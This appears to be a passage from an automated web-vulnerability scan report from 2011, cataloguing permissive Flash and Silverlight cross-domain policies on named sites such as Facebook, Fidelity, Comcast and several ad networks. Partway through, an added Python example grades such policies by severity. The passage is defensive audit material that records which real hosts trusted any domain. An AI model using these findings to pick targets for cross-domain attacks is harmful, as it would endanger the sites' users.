Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.23.37
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.90. http://www.fidelity.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fidelity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Mon, 30 Jul 2007 18:35:02 GMT
Content-Length: 256
ETag: "100-46ae2f56"
Accept-Ranges: bytes
Date: Tue, 06 Sep 2011 12:48:34 GMT
Connection: close
Set-Cookie: v1st=F13F975838C16CC; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fidelity.com

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fidelity.com" />
<allow-access-from domain="*.fmr.com" />
...[SNIP]...

3.91. https://www.fidelity.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.fidelity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Mon, 30 Jul 2007 18:35:02 GMT
ETag: W/"100-46ae2f56"
Date: Tue, 06 Sep 2011 12:48:57 GMT
Content-Length: 256
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fidelity.com" />
<allow-access-from domain="*.fmr.com" />
...[SNIP]...

3.92. http://www.pgatour.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pgatour.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:27 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 18:42:40 GMT
Accept-Ranges: bytes
Content-Length: 1831
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="pga-livescoring.chester.contentproject.com"/>
   <allow-access-from domain="*.pgatour.com"/>
   <allow-access-from domain="*.pga.com"/>
   <allow-access-from domain="i.cdn.turner.com"/>
   <allow-access-from domain="*.cnn.com"/>
   <allow-access-from domain="*.turner.com"/>
   <allow-access-from domain="*.cnn.net"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
   <allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="*.2mdn.net"/>
   <allow-access-from domain="*.i-traffic.com"/>
   <allow-access-from domain="ar.atwola.com"/>
   <allow-access-from domain="*.itraffic.com"/>
   <allow-access-from domain="*.agency.com"/>
   <allow-access-from domain="*.aol.com"/>
   <allow-access-from domain="*.time.com"/>
   <allow-access-from domain="*.VillageVoice.com"/>
   <allow-access-from domain="*.nymag.com"/>
   <allow-access-from domain="*. salon.com"/>
   <allow-access-from domain="*.secondthought.com"/>
   <allow-access-from domain="*.clk4.com"/>
   <allow-access-from domain="servedby.advertising.com"/>
   <allow-access-from domain="bannerfarm.advertising.com"/>
   <allow-access-from domain="*.advertising.com"/>
   <allow-access-from domain="*.crewintegrated.com"/>
   <allow-access-from domain="gfx.klipmart.com"/>
   <allow-access-from domain="*.klipmart.com"/>
   <allow-access-from domain="*.viewpoint.com"/>
   <allow-access-from domain="*.unicast.com"/>
   <allow-access-from domain="*.go123ov.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.majorschampionships.com"/>
...[SNIP]...

3.93. http://xfinity.comcast.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xfinity.comcast.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: xfinity.comcast.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.58 (Unix)
Last-Modified: Tue, 14 Sep 2010 01:19:26 GMT
ETag: "25d5d5-444-f82380"
Accept-Ranges: bytes
Content-Length: 1092
Content-Type: application/xml
Cache-Control: max-age=2592000
Date: Tue, 06 Sep 2011 12:22:13 GMT
Connection: close

<?xml version="1.0"?>

<!--static-->

<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.xfinity.com"/>
<allow-access-from domain="*.fancast.com"/>
<allow-access-from domain="beta.comcast.net" />
<allow-access-from domain="*.cimcontent.net" />
<allow-access-from domain="chrome.comcast.net" />
<allow-access-from domain="static.comcast.net" />
<allow-access-from domain="por-img.cimcontent.net" />
<allow-access-from domain="comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.comcastonline.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.att.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.xcal.tv" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.teamcomcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" secure="false"/>
...[SNIP]...

3.94. http://www.vonage.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:08 GMT
Server: Apache
Last-Modified: Thu, 21 Feb 2008 11:50:31 GMT
ETag: "a5474d-bf-446a9b66f2fc0"
Accept-Ranges: bytes
Content-Length: 191
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="www.vonage-media.co.uk" />
<allow-access-from domain="vonage-media.co.uk" />
</cross-domain-policy>

4. Silverlight cross-domain policy
There are 15 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
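Added example, not part of this report or of the scanner that produced it: the Python below grades a published policy the way the Flash findings in section 3 and the Silverlight findings in this section are graded (any-domain wildcard is High, a domain wildcard such as *.example.com is Low, specific domains only is Information). It also flags two details visible in the captured responses above that the report text does not call out: secure="false" on a policy served over HTTPS (which extends the trust to SWFs loaded over plain http://), and unrestricted forwarding of custom request headers (allow-http-request-headers-from domain="*" in Flash, http-request-headers="*" in Silverlight). The sample policies are constructed for the example and modelled on the shapes captured above; the example.com / example.net / example-media.co.uk names in them are placeholders, not hosts from the report.

```python
"""Grade Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml)
cross-domain policies using the severity ladder of the report above.

Added example, not part of the scanner report. Severity: any-domain
wildcard -> High, domain wildcard -> Low, specific domains only -> Information.
Extra checks: secure="false" on an HTTPS-served policy, unrestricted forwarding
of custom request headers, and a missing <site-control> meta-policy.
"""
import xml.etree.ElementTree as ET  # stdlib; use defusedxml for policies fetched from untrusted hosts
from dataclasses import dataclass, field


@dataclass
class PolicyReport:
    kind: str                       # "flash" or "silverlight"
    severity: str = "None"          # "High", "Low", "Information" or "None"
    allowed: list = field(default_factory=list)   # domain / uri values as published
    notes: list = field(default_factory=list)     # secondary findings


# Values that admit every origin (Flash uses "*", Silverlight uses scheme://*).
ANY_DOMAIN = {"*", "http://*", "https://*"}


def severity_for(domains):
    """Worst-case grade for a list of allowed domain patterns."""
    if any(d.strip() in ANY_DOMAIN for d in domains):
        return "High"
    if any("*" in d for d in domains):
        return "Low"
    return "Information" if domains else "None"


def analyze_crossdomain(xml_text, served_over_https=False):
    """Grade a Flash crossdomain.xml document (the DOCTYPE is left unresolved by expat)."""
    root = ET.fromstring(xml_text)
    rep = PolicyReport(kind="flash")
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        rep.allowed.append(domain)
        # secure="false" lets SWFs loaded over plain http:// use an https:// policy.
        if served_over_https and el.get("secure", "true").lower() == "false":
            rep.notes.append(f'secure="false" on {domain}: http:// origins also trusted')
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            rep.notes.append("any domain may send custom request headers")
    if root.find("site-control") is None:
        rep.notes.append('no <site-control>; set permitted-cross-domain-policies="master-only"')
    rep.severity = severity_for(rep.allowed)
    return rep


def analyze_clientaccesspolicy(xml_text):
    """Grade a Silverlight clientaccesspolicy.xml document."""
    root = ET.fromstring(xml_text)
    rep = PolicyReport(kind="silverlight")
    for allow in root.iter("allow-from"):
        if allow.get("http-request-headers") == "*":
            rep.notes.append("any domain may send custom request headers")
        for dom in allow.findall("domain"):
            rep.allowed.append(dom.get("uri", ""))
    rep.severity = severity_for(rep.allowed)
    return rep


# Constructed samples, modelled on the shapes captured in the report; hostnames are placeholders.
FLASH_WILDCARD = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*.example.com" secure="false" />
  <allow-access-from domain="static.example.net" />
</cross-domain-policy>"""

FLASH_SPECIFIC = """<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example-media.co.uk" />
</cross-domain-policy>"""

SILVERLIGHT_ANY = """<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="http://*" />
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true" />
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""


if __name__ == "__main__":
    for name, rep in [
        ("flash wildcard", analyze_crossdomain(FLASH_WILDCARD, served_over_https=True)),
        ("flash specific", analyze_crossdomain(FLASH_SPECIFIC)),
        ("silverlight any", analyze_clientaccesspolicy(SILVERLIGHT_ANY)),
    ]:
        print(f"{name}: {rep.severity} allowed={rep.allowed} notes={rep.notes}")
```

To run it against a live host, fetch /crossdomain.xml or /clientaccesspolicy.xml with the GET shown in each finding and pass the body in; set served_over_https according to the scheme you fetched over, since secure="false" only changes anything on an HTTPS policy. Grading stops at the domain list, as the report does; whether a Low finding matters still depends on what runs on every host matching the wildcard.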


4.1. http://ads.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:16c4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:45:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 12:45:57 GMT
Date: Tue, 06 Sep 2011 12:45:57 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.3. http://citizenstelecom.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://citizenstelecom.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: citizenstelecom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:44 GMT
Server: Omniture DC/2.0.0
xserver: www69
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.4. http://ec.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Age: 283499
Date: Tue, 06 Sep 2011 12:48:17 GMT
Expires: Sat, 10 Sep 2011 06:03:18 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.5. http://integrate.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://integrate.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Omniture DC/2.0.0
xserver: www56
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.6. http://metrics.scottrade.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.scottrade.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.scottrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:47 GMT
Server: Omniture DC/2.0.0
xserver: www168
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.7. http://metrics.vonage.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:49 GMT
Server: Omniture DC/2.0.0
xserver: www5
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.8. http://pixel.quantserve.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:29 GMT
Content-Type: text/xml
Content-Length: 312
Date: Tue, 06 Sep 2011 12:45:29 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

4.9. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 05 Sep 2011 19:52:39 GMT
Expires: Tue, 06 Sep 2011 19:52:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 59834

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.10. http://serviceo.comcast.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://serviceo.comcast.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: serviceo.comcast.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:41 GMT
Server: Omniture DC/2.0.0
xserver: www393
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.11. http://spe.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Sun, 11 Sep 2011 18:38:55 GMT
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.12. http://speed.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:14 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.13. http://whitefence.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitefence.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: whitefence.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Omniture DC/2.0.0
xserver: www184
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.14. http://www.fidelity.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fidelity.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Fri, 01 Jul 2011 04:42:13 GMT
Content-Length: 449
ETag: "1c1-4e0d5025"
Accept-Ranges: bytes
Date: Tue, 06 Sep 2011 12:48:34 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="http://*.fmr.com" />
               <domain uri="https://*.fmr.com" />
               <domain uri="http://*.fidelity.com" />
               <domain uri="https://*.fidelity.com" />
...[SNIP]...

4.15. https://www.fidelity.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.fidelity.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Fri, 01 Jul 2011 04:42:13 GMT
ETag: W/"1c1-4e0d5025"
Date: Tue, 06 Sep 2011 12:48:58 GMT
Content-Length: 449
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="http://*.fmr.com" />
               <domain uri="https://*.fmr.com" />
               <domain uri="http://*.fidelity.com" />
               <domain uri="https://*.fidelity.com" />
...[SNIP]...

5. SSL cookie without secure flag set
There are 5 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

